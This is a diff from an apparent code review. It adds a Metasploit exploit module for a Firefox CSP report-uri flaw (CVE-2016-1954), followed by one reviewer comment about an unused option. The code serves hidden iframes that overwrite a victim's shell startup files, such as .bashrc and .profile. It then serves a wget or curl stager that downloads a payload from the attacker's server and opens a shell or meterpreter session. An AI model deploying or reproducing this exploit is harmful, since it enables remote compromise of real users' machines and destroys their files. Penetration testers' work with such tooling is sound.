modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb

```diff
@@ -0,0 +1,146 @@
+        wget binary on the system is then used to stage a metasploit payload.
+
+        For this module to work, you must know or guess (up to a few hundred tries)
+        the username of the logged in user. Some good paths to try are:
+
+        /home/user/.profile,
+        /home/user/.bashrc,
+        /home/user/.zshrc,
+        /home/user/.bash_aliases,
+        /home/user/.login,
+        /var/root/.profile,
+        /var/root/.login
+
+        As a warning, this module is fairly destructive and will attempt to overwrite
+        any paths specified in FILES and eventually erase them. Use with caution.
+      },
+      'Author'         => [
+        'Nicolas Golubovic', # vuln discoverer
+        'evo'
+      ],
+      'License'     => MSF_LICENSE,
+      'Arch'           => [ARCH_CMD],
+      'Targets'        => [ ['Automatic', {}] ],
+      'Platform'      => %w{ linux osx solaris unix },
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => { 'PrependFork' => true },
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'DisclosureDate' => 'Mar 8 2016',
+      'References' => [
+        ['URL', 'https://www.mozilla.org/en-US/security/advisories/mfsa2016-17/'],
+        ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1243178'],
+        ['CVE', '2016-1954']
+      ]
+    ))
+
+    register_options([
+      OptString.new('FILES', [
+        true,
+        'List of file paths to write shell script to',
+        '/home/ubuntu/.login'
+      ]),
+      OptString.new('URIPATH', [
+        true,
+        'Path to the exploit. This needs to be "/" for space purposes.',
+        '/'
+      ])
+    ], self.class)
+
+    register_advanced_options([
+      OptBool.new('UseCurl', [
+        false,
+        'Use curl instead of wget to stage the payload.',
+        false
+      ]),
+      OptString.new('TmpDir', [
+        false,
+        'A writable temporary dir for storing the staged payload.',
+        '/tmp'
+      ])
+    ])
+  end
+
+  def exploit
+    register_file_for_cleanup(payload_path)
+    super
+  end
+
+  def on_request_uri(cli, request)
+    if request.headers['User-Agent'] =~ /(curl|wget)/i
+      print_good("Shell script request detected. Serving payload stager.")
+      send_response(cli, stager, 'Content-Type' => 'text/plain')
+    else
+      if request.qstring['file']
+        path = request.qstring['file']
+        print_status("Client loaded exploit for path #{path}.")
+        send_response(cli, per_file_html, {
+          'Content-Security-Policy' => "script-src 'self'; report-uri file://#{path}",
+          'Content-Type' => 'text/html'
+        })
+      else
+        print_status("Client loaded main page.")
+        send_response_html(cli, main_html)
+      end
+    end
+  end
+
+  def files
+    datastore['FILES'].split(/\s+|,/)
+  end
+
+  def main_html
+    css = 'style="width:0;height:0;border:0"'
+    frames = files.map { |f| "<iframe #{css} src='/?file=#{Rex::Text.uri_encode(f)}'></iframe>" }
```

Comment:
This does not actually use URIPATH - is that on purpose? Should we just deregister URIPATH altogether?